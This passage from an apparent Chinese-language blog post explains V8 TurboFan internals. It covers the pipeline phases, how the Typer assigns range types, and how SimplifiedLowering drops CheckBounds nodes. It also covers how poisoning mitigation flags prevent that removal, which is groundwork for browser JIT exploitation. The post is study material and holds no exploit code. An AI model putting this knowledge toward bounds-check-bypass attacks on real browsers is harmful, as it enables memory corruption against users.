class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(Linkage* linkage)</span> </span>&#123;</span><br><span class="line">  PipelineData* data = <span class="keyword">this</span>-&gt;data_;</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;lowering&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">is_loop_peeling_enabled</span>()) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoopPeelingPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoopPeelingPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoopExitEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoopExitEliminationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_load_elimination) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;LoadEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(LoadEliminationPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_escape) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;EscapeAnalysisPhase&gt;();</span><br><span class="line">    <span class="keyword">if</span> (data-&gt;<span class="built_in">compilation_failed</span>()) &#123;</span><br><span class="line">      <span class="built_in">info</span>()-&gt;<span class="built_in">AbortOptimization</span>(</span><br><span class="line">          BailoutReason::kCyclicObjectStateDetectedInEscapeAnalysis);</span><br><span class="line">      data-&gt;<span class="built_in">EndPhaseKind</span>();</span><br><span class="line">      <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(EscapeAnalysisPhase::<span class="built_in">phase_name</span>());</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Perform simplified lowering. This has to run w/o the Typer decorator,</span></span><br><span class="line">  <span class="comment">// because we cannot compute meaningful types anyways, and the computed types</span></span><br><span class="line">  <span class="comment">// might even conflict with the representation/truncation logic.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;SimplifiedLoweringPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(SimplifiedLoweringPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// From now on it is invalid to look at types on the nodes, because the types</span></span><br><span class="line">  <span class="comment">// on the nodes might not make sense after representation selection due to the</span></span><br><span class="line">  <span class="comment">// way we handle truncations; if we&#x27;d want to look at types afterwards we&#x27;d</span></span><br><span class="line">  <span class="comment">// essentially need to re-type (large portions of) the graph.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// In order to catch bugs related to type access after this point, we now</span></span><br><span class="line">  <span class="comment">// remove the types from the nodes (currently only in Debug builds).</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DEBUG</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;UntyperPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(UntyperPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run generic lowering pass.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;GenericLoweringPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GenericLoweringPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">BeginPhaseKind</span>(<span class="string">&quot;block building&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Run early optimization pass.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;EarlyOptimizationPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EarlyOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">Run</span>&lt;EffectControlLinearizationPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(EffectControlLinearizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_store_elimination) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;StoreStoreEliminationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(StoreStoreEliminationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Optimize control flow.</span></span><br><span class="line">  <span class="keyword">if</span> (FLAG_turbo_cf_optimization) &#123;</span><br><span class="line">    <span class="built_in">Run</span>&lt;ControlFlowOptimizationPhase&gt;();</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(ControlFlowOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Optimize memory access and allocation operations.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;MemoryOptimizationPhase&gt;();</span><br><span class="line">  <span class="comment">// TODO(jarin, rossberg): Remove UNTYPED once machine typing works.</span></span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(MemoryOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Lower changes that have been inserted before.</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;LateOptimizationPhase&gt;();</span><br><span class="line">  <span class="comment">// TODO(jarin, rossberg): Remove UNTYPED once machine typing works.</span></span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(LateOptimizationPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">  data-&gt;<span class="built_in">source_positions</span>()-&gt;<span class="built_in">RemoveDecorator</span>();</span><br><span class="line">  <span class="keyword">if</span> (data-&gt;<span class="built_in">info</span>()-&gt;<span class="built_in">trace_turbo_json_enabled</span>()) &#123;</span><br><span class="line">    data-&gt;<span class="built_in">node_origins</span>()-&gt;<span class="built_in">RemoveDecorator</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">ComputeScheduledGraph</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">SelectInstructions</span>(linkage);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>由于上面两个函数涉及到的<code>Phase</code>众多，这里请各位自行阅读源码来了解各个Phase的具体功能。</p><p>接下来我们只介绍几个比较重要的<code>Phases</code>：<code>GraphBuilderPhase</code>、<code>TyperPhase</code>和<code>SimplifiedLoweringPhase</code>。</p><h3 id="2-GraphBuilderPhase">2. GraphBuilderPhase</h3><ul><li><p><code>GraphBuilderPhase</code>将遍历字节码，并建一个初始的图，这个图将用于接下来Phase的处理，包括但不限于各种代码优化。</p></li><li><p>一个简单的例子</p><p><img src="/2021/01/v8-turboFan/bytecodegraphbuilder.png" alt="img"></p></li></ul><h3 id="3-TyperPhase">3. TyperPhase</h3><ul><li><p><code>TyperPhase</code>将会遍历整个图的所有结点，并给每个结点设置一个<code>Type</code>属性，该操作将在建图完成后被执行</p><blockquote><p>给每个结点设置Type的操作是不是极其类似于编译原理中的语义分析呢？ XD</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::CreateGraph</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="built_in">Run</span>&lt;GraphBuilderPhase&gt;();</span><br><span class="line">  <span class="built_in">RunPrintAndVerify</span>(GraphBuilderPhase::<span class="built_in">phase_name</span>(), <span class="literal">true</span>);</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// Run the type-sensitive lowerings and optimizations on the graph.</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Type the graph and keep the Typer running on newly created nodes within</span></span><br><span class="line">    <span class="comment">// this scope; the Typer is automatically unlinked from the Graph once we</span></span><br><span class="line">    <span class="comment">// leave this scope below.</span></span><br><span class="line">    <span class="function">Typer <span class="title">typer</span><span class="params">(isolate(), data-&gt;js_heap_broker(), flags, data-&gt;graph())</span></span>;</span><br><span class="line">    <span class="built_in">Run</span>&lt;TyperPhase&gt;(&amp;typer);</span><br><span class="line">    <span class="built_in">RunPrintAndVerify</span>(TyperPhase::<span class="built_in">phase_name</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>其中，具体执行的是<code>TyperPhase::Run</code>函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">TyperPhase</span> &#123;</span><br><span class="line">  <span class="function"><span class="type">static</span> <span class="type">const</span> <span class="type">char</span>* <span class="title">phase_name</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> <span class="string">&quot;typer&quot;</span>; &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">Run</span><span class="params">(PipelineData* data, Zone* temp_zone, Typer* typer)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    typer-&gt;<span class="built_in">Run</span>(roots, &amp;induction_vars);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>在该函数中继续调用<code>Typer::Run</code>函数，并在<code>GraphReducer::ReduceGraph</code>函数中最终调用到<code>Typer::Visitor::Reduce</code>函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">Typer::Run</span><span class="params">(<span class="type">const</span> NodeVector&amp; roots,</span></span></span><br><span class="line"><span class="params"><span class="function">                LoopVariableOptimizer* induction_vars)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="function">Visitor <span class="title">visitor</span><span class="params">(<span class="keyword">this</span>, induction_vars)</span></span>;</span><br><span class="line">  <span class="function">GraphReducer <span class="title">graph_reducer</span><span class="params">(zone(), graph())</span></span>;</span><br><span class="line">  graph_reducer.<span class="built_in">AddReducer</span>(&amp;visitor);</span><br><span class="line">  <span class="keyword">for</span> (Node* <span class="type">const</span> root : roots) graph_reducer.<span class="built_in">ReduceNode</span>(root);</span><br><span class="line">  graph_reducer.<span class="built_in">ReduceGraph</span>();</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>Typer::Visitor::Reduce</code>函数中存在一个较大的switch结构，通过该switch结构，当Visitor遍历每个node时，即可最终调用到对应的<code>XXXTyper</code>函数。</p><blockquote><p>例如，对于一个JSCall结点，将在TyperPhase中最终调用到<code>Typer::Visitor::JSCallTyper</code></p></blockquote></li><li><p>这里我们简单看一下<code>JSCallTyper</code>函数源码，该函数中存在一个很大的switch结构，该结构将设置每个<code>Builtin</code>函数结点的<code>Type</code>属性，即函数的返回值类型。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">JSCallTyper</span>(Type fun, Typer* t) &#123;</span><br><span class="line">  <span class="keyword">if</span> (!fun.<span class="built_in">IsHeapConstant</span>() || !fun.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>().<span class="built_in">IsJSFunction</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NonInternal</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  JSFunctionRef function = fun.<span class="built_in">AsHeapConstant</span>()-&gt;<span class="built_in">Ref</span>().<span class="built_in">AsJSFunction</span>();</span><br><span class="line">  <span class="keyword">if</span> (!function.<span class="built_in">shared</span>().<span class="built_in">HasBuiltinFunctionId</span>()) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NonInternal</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">switch</span> (function.<span class="built_in">shared</span>().<span class="built_in">builtin_function_id</span>()) &#123;</span><br><span class="line">    <span class="keyword">case</span> BuiltinFunctionId::kMathRandom:</span><br><span class="line">      <span class="keyword">return</span> Type::<span class="built_in">PlainNumber</span>();</span><br><span class="line">  <span class="comment">// ...</span></span><br></pre></td></tr></table></figure></li><li><p>而对于一个常数<code>NumberConstant</code>类型，<code>TyperPhase</code>也会打上一个对应的类型</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeNumberConstant</span>(Node* node) </span><br><span class="line">  <span class="comment">// 注意这里使用的是double，这也就说明了为什么Number.MAX_SAFE_INTEGER = 9007199254740991</span></span><br><span class="line">  <span class="type">double</span> number = <span class="built_in">OpParameter</span>&lt;<span class="type">double</span>&gt;(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">NewConstant</span>(number, <span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而在<code>Type::NewConstant</code>函数中，我们会发现一个神奇的设计：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Type <span class="title">Type::NewConstant</span><span class="params">(<span class="type">double</span> value, Zone* zone)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 对于一个正常的整数</span></span><br><span class="line">  <span class="keyword">if</span> (RangeType::<span class="built_in">IsInteger</span>(value)) &#123;</span><br><span class="line">    <span class="comment">// 实际上所设置的Type是一个range！</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Range</span>(value, value, zone);</span><br><span class="line">  <span class="comment">// 否则如果是一个异常的-0,则返回对应的MinusZero</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">IsMinusZero</span>(value)) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">MinusZero</span>();</span><br><span class="line">  <span class="comment">// 如果是NAN，则返回NaN</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (std::<span class="built_in">isnan</span>(value)) &#123;</span><br><span class="line">    <span class="keyword">return</span> Type::<span class="built_in">NaN</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(OtherNumberConstantType::<span class="built_in">IsOtherNumberConstant</span>(value));</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">OtherNumberConstant</span>(value, zone);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>对于JS代码中的一个NumberConstant，<strong>实际上设置的Type是一个Range</strong>，只不过这个Range的首尾范围均是该数，例如<code>NumberConstant(3) =&gt; Range(3, 3, zone)</code></p></li><li><p>以下这张图可以证明<code>TyperPhase</code>正如预期那样执行：</p><p><img src="/2021/01/v8-turboFan/typer.png" alt="img"></p></li><li><p>与之相应的，v8采用了SSA。因此对于一个Phi结点，它将设置该节点的Type为几个可能值的Range的并集。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="type">int</span> arity = node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>();</span><br><span class="line">  Type type = <span class="built_in">Operand</span>(node, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">1</span>; i &lt; arity; ++i) &#123;</span><br><span class="line">    type = Type::<span class="built_in">Union</span>(type, <span class="built_in">Operand</span>(node, i), <span class="built_in">zone</span>());</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> type;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>请看以下示例：</p><p><img src="/2021/01/v8-turboFan/phi.png" alt="img"></p></li></ul><h3 id="4-SimplifiedLoweringPhase">4. SimplifiedLoweringPhase</h3><ul><li><p><code>SimplifiedLoweringPhase</code>会遍历结点做一些处理，同时也会对图做一些优化操作。</p><p>这里我们只关注该<code>Phase</code>优化<code>CheckBound</code>的细节，因为<code>CheckBound</code>通常是用于判断 JS数组（例如ArrayBuffer） 是否越界使用  所设置的结点。</p></li><li><p>首先我们可以通过以下路径来找到优化<code>CheckBound</code>的目标代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SimplifiedLoweringPhase::Run</span><br><span class="line">    SimplifiedLowering::LowerAllNodes</span><br><span class="line">      RepresentationSelector::Run</span><br><span class="line">        RepresentationSelector::VisitNode</span><br></pre></td></tr></table></figure><p>目标代码如下:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Dispatching routine for visiting the node &#123;node&#125; with the usage &#123;use&#125;.</span></span><br><span class="line">  <span class="comment">// Depending on the operator, propagate new usage info to the inputs.</span></span><br><span class="line">  <span class="function"><span class="type">void</span> <span class="title">VisitNode</span><span class="params">(Node* node, Truncation truncation,</span></span></span><br><span class="line"><span class="params"><span class="function">                SimplifiedLowering* lowering)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Unconditionally eliminate unused pure nodes (only relevant if there&#x27;s</span></span><br><span class="line">    <span class="comment">// a pure operation in between two effectful ones, where the last one</span></span><br><span class="line">    <span class="comment">// is unused).</span></span><br><span class="line">    <span class="comment">// Note: We must not do this for constants, as they are cached and we</span></span><br><span class="line">    <span class="comment">// would thus kill the cached &#123;node&#125; during lowering (i.e. replace all</span></span><br><span class="line">    <span class="comment">// uses with Dead), but at that point some node lowering might have</span></span><br><span class="line">    <span class="comment">// already taken the constant &#123;node&#125; from the cache (while it was in</span></span><br><span class="line">    <span class="comment">// a sane state still) and we would afterwards replace that use with</span></span><br><span class="line">    <span class="comment">// Dead as well.</span></span><br><span class="line">    <span class="keyword">if</span> (node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ValueInputCount</span>() &gt; <span class="number">0</span> &amp;&amp;</span><br><span class="line">        node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">HasProperty</span>(Operator::kPure)) &#123;</span><br><span class="line">      <span class="keyword">if</span> (truncation.<span class="built_in">IsUnused</span>()) <span class="keyword">return</span> <span class="built_in">VisitUnused</span>(node);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">switch</span> (node-&gt;<span class="built_in">opcode</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">        <span class="keyword">case</span> IrOpcode::kCheckBounds: &#123;</span><br><span class="line">            <span class="type">const</span> CheckParameters&amp; p = <span class="built_in">CheckParametersOf</span>(node-&gt;<span class="built_in">op</span>());</span><br><span class="line">            Type index_type = <span class="built_in">TypeOf</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">            Type length_type = <span class="built_in">TypeOf</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">1</span>));</span><br><span class="line">            <span class="keyword">if</span> (index_type.<span class="built_in">Is</span>(Type::<span class="built_in">Integral32OrMinusZero</span>())) &#123;</span><br><span class="line">              <span class="comment">// Map -0 to 0, and the values in the [-2^31,-1] range to the</span></span><br><span class="line">              <span class="comment">// [2^31,2^32-1] range, which will be considered out-of-bounds</span></span><br><span class="line">              <span class="comment">// as well, because the &#123;length_type&#125; is limited to Unsigned31.</span></span><br><span class="line">              <span class="built_in">VisitBinop</span>(node, UseInfo::<span class="built_in">TruncatingWord32</span>(),</span><br><span class="line">                        MachineRepresentation::kWord32);</span><br><span class="line">              <span class="keyword">if</span> (<span class="built_in">lower</span>() &amp;&amp; lowering-&gt;poisoning_level_ ==</span><br><span class="line">                                PoisoningMitigationLevel::kDontPoison) &#123;</span><br><span class="line">                <span class="comment">// 可以看到，如果当前索引的最大值小于length的最小值，则表示当前索引的使用没有越界</span></span><br><span class="line">                <span class="keyword">if</span> (index_type.<span class="built_in">IsNone</span>() || length_type.<span class="built_in">IsNone</span>() ||</span><br><span class="line">                    (index_type.<span class="built_in">Min</span>() &gt;= <span class="number">0.0</span> &amp;&amp;</span><br><span class="line">                    index_type.<span class="built_in">Max</span>() &lt; length_type.<span class="built_in">Min</span>())) &#123;</span><br><span class="line">                  <span class="comment">// The bounds check is redundant if we already know that</span></span><br><span class="line">                  <span class="comment">// the index is within the bounds of [0.0, length[.</span></span><br><span class="line">                  <span class="comment">// CheckBound将会被优化</span></span><br><span class="line">                  <span class="built_in">DeferReplacement</span>(node, node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">                &#125;</span><br><span class="line">              &#125;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              <span class="built_in">VisitBinop</span>(</span><br><span class="line">                  node,</span><br><span class="line">                  UseInfo::<span class="built_in">CheckedSigned32AsWord32</span>(kIdentifyZeros, p.<span class="built_in">feedback</span>()),</span><br><span class="line">                  UseInfo::<span class="built_in">TruncatingWord32</span>(), MachineRepresentation::kWord32);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">          &#125;</span><br><span class="line">    <span class="comment">// ....</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure><p>可以看到，在<code>CheckBound</code>的优化判断逻辑中，如果当前索引的最大值小于length的最小值，则表示当前索引的使用没有越界，此时将会移除<code>CheckBound</code>结点以简化IR图。</p><blockquote><p>需要注意NumberConstant结点的Type是一个Range类型，因此才会有最大值Max和最小值Min的概念。</p></blockquote></li><li><p>这里需要解释一下环境搭配中所说的，为什么要<strong>添加一个编译参数<code>v8_optimized_debug = false</code></strong>，注意看上面判断条件中的这行条件</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">lower</span>() &amp;&amp; lowering-&gt;poisoning_level_ ==</span><br><span class="line">                                  PoisoningMitigationLevel::kDontPoison)</span><br></pre></td></tr></table></figure><p><code>visitNode</code>时有三个状态，分别是<code>Phase::PROPAGATE</code>（信息收集）、<code>Phase::RETYPE</code>（从类型反馈中获取类型）以及<code>Phase::LOWER</code>（开始优化）。当真正<strong>开始优化</strong>时，<code>lower()</code>条件自然成立，因此我们无需处理这个。</p><p>但对于下一个条件，通过动态调试可以得知，<code>poisoning_level</code>始终不为<code>PoisoningMitigationLevel::kDontPoison</code>。通过追溯<code>lowering-&gt;poisoning_level_</code>，我们可以发现它实际上在<code>PipelineCompilationJob::PrepareJobImpl</code>中被设置</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">PipelineCompilationJob::Status <span class="title">PipelineCompilationJob::PrepareJobImpl</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Isolate* isolate)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"><span class="comment">// Compute and set poisoning level.</span></span><br><span class="line">  PoisoningMitigationLevel load_poisoning =</span><br><span class="line">      PoisoningMitigationLevel::kDontPoison;</span><br><span class="line">  <span class="keyword">if</span> (FLAG_branch_load_poisoning) &#123;</span><br><span class="line">    load_poisoning = PoisoningMitigationLevel::kPoisonAll;</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (FLAG_untrusted_code_mitigations) &#123;</span><br><span class="line">    load_poisoning = PoisoningMitigationLevel::kPoisonCriticalOnly;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而<code>FLAG_branch_load_poisoning</code>始终为<code>false</code>，<code>FLAG_untrusted_code_mitigations</code>始终为<code>true</code></p><blockquote><p>编译参数v8_untrusted_code_mitigations 默认 true，使得宏DISABLE_UNTRUSTED_CODE_MITIGATIONS没有被定义，因此默认设置<code>FLAG_untrusted_code_mitigations = true</code></p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/flag-definitions.h</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 设置`FLAG_untrusted_code_mitigations`</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> DISABLE_UNTRUSTED_CODE_MITIGATIONS</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS false</span></span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS true</span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"><span class="built_in">DEFINE_BOOL</span>(untrusted_code_mitigations, V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS,</span><br><span class="line">            <span class="string">&quot;Enable mitigations for executing untrusted code&quot;</span>)</span><br><span class="line"><span class="meta">#<span class="keyword">undef</span> V8_DEFAULT_UNTRUSTED_CODE_MITIGATIONS</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 